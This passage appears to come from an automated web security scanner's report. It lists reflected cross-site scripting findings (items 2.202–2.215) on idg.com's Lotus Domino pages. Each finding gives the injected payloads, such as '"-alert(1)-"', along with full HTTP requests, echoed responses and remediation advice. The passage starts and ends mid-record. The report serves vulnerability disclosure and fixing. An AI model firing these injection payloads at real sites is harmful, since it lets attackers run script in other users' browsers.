Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:31 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5021
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/home?a7c1b"-alert(1)-"52c0a93e1d4=1");
} catch(err) {}</script>
...[SNIP]...

2.202. http://idg.com/www/homenew.nsf/home [readform parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/home

Issue detail

The value of the readform request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9917"-alert(1)-"f2355dde872 was submitted in the readform parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/home?readformc9917"-alert(1)-"f2355dde872 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:21 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5027
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/home?readformc9917"-alert(1)-"f2355dde872");
} catch(err) {}</script>
...[SNIP]...

2.203. http://idg.com/www/homenew.nsf/menu.js [OpenJavascriptLibrary parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/menu.js

Issue detail

The value of the OpenJavascriptLibrary request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 180d9"-alert(1)-"cdc8053a05f was submitted in the OpenJavascriptLibrary parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/menu.js?OpenJavascriptLibrary180d9"-alert(1)-"cdc8053a05f HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:46 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5043
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/menu.js?OpenJavascriptLibrary180d9"-alert(1)-"cdc8053a05f");
} catch(err) {}</script>
...[SNIP]...

2.204. http://idg.com/www/homenew.nsf/menu.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/menu.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d44cf"%3bcaf6978cbc3 was submitted in the REST URL parameter 1. This input was echoed as d44cf";caf6978cbc3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwd44cf"%3bcaf6978cbc3/homenew.nsf/menu.js HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:38 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5011
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwd44cf";caf6978cbc3/homenew.nsf/menu.js");
} catch(err) {}</script>
...[SNIP]...

2.205. http://idg.com/www/homenew.nsf/menu.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/menu.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebec9"%3beedfd5695ac was submitted in the REST URL parameter 3. This input was echoed as ebec9";eedfd5695ac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/menu.jsebec9"%3beedfd5695ac HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:39 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5011
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/menu.jsebec9";eedfd5695ac");
} catch(err) {}</script>
...[SNIP]...

2.206. http://idg.com/www/homenew.nsf/menu.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/menu.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97eb7"-alert(1)-"93cd9db3b7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/menu.js?97eb7"-alert(1)-"93cd9db3b7d=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:38 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5024
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/menu.js?97eb7"-alert(1)-"93cd9db3b7d=1");
} catch(err) {}</script>
...[SNIP]...

2.207. http://idg.com/www/homenew.nsf/navmain.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/navmain.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34e94"%3b127e9d03196 was submitted in the REST URL parameter 1. This input was echoed as 34e94";127e9d03196 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www34e94"%3b127e9d03196/homenew.nsf/navmain.css HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:26 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5015
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www34e94";127e9d03196/homenew.nsf/navmain.css");
} catch(err) {}</script>
...[SNIP]...

2.208. http://idg.com/www/homenew.nsf/navmain.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/navmain.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f539e"%3b607861d5da5 was submitted in the REST URL parameter 3. This input was echoed as f539e";607861d5da5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/navmain.cssf539e"%3b607861d5da5 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:26 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5015
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/navmain.cssf539e";607861d5da5");
} catch(err) {}</script>
...[SNIP]...

2.209. http://idg.com/www/homenew.nsf/navmain.css [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/navmain.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd433"-alert(1)-"2d45f6a6216 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/navmain.css?fd433"-alert(1)-"2d45f6a6216=1 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:25 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5028
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/navmain.css?fd433"-alert(1)-"2d45f6a6216=1");
} catch(err) {}</script>
...[SNIP]...

2.210. http://idg.com/www/homenew.nsf/newsitems.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/newsitems.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cd0f"%3bf6fb67135af was submitted in the REST URL parameter 1. This input was echoed as 3cd0f";f6fb67135af in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www3cd0f"%3bf6fb67135af/homenew.nsf/newsitems.css HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:29 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5017
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www3cd0f";f6fb67135af/homenew.nsf/newsitems.css");
} catch(err) {}</script>
...[SNIP]...

2.211. http://idg.com/www/homenew.nsf/newsitems.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/newsitems.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2f39"%3b146b3913e0f was submitted in the REST URL parameter 3. This input was echoed as c2f39";146b3913e0f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/newsitems.cssc2f39"%3b146b3913e0f HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:29 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5017
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/newsitems.cssc2f39";146b3913e0f");
} catch(err) {}</script>
...[SNIP]...

2.212. http://idg.com/www/homenew.nsf/newsitems.css [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/newsitems.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 652e1"-alert(1)-"826b15b8000 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/newsitems.css?652e1"-alert(1)-"826b15b8000=1 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:28 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5030
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/newsitems.css?652e1"-alert(1)-"826b15b8000=1");
} catch(err) {}</script>
...[SNIP]...

2.213. http://idg.com/www/homenew.nsf/public_smo_scripts.js [OpenJavascriptLibrary parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/public_smo_scripts.js

Issue detail

The value of the OpenJavascriptLibrary request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcdfe"-alert(1)-"a48c23ad8af was submitted in the OpenJavascriptLibrary parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/public_smo_scripts.js?OpenJavascriptLibrarydcdfe"-alert(1)-"a48c23ad8af HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:35 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5057
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
cript type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/public_smo_scripts.js?OpenJavascriptLibrarydcdfe"-alert(1)-"a48c23ad8af");
} catch(err) {}</script>
...[SNIP]...

2.214. http://idg.com/www/homenew.nsf/public_smo_scripts.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/public_smo_scripts.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46fe3"%3b067128b6aef was submitted in the REST URL parameter 1. This input was echoed as 46fe3";067128b6aef in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www46fe3"%3b067128b6aef/homenew.nsf/public_smo_scripts.js?OpenJavascriptLibrary HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:35 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5047
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www46fe3";067128b6aef/homenew.nsf/public_smo_scripts.js?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

2.215. http://idg.com/www/homenew.nsf/public_smo_scripts.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/public_smo_scripts.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c119d"%3be19dc6781a0 was submitted in the REST URL parameter 3. This input was echoed as c119d";e19dc6781a0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/public_smo_scripts.jsc119d"%3be19dc6781a0?OpenJavascriptLibrary HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:35 GMT
Connection: close
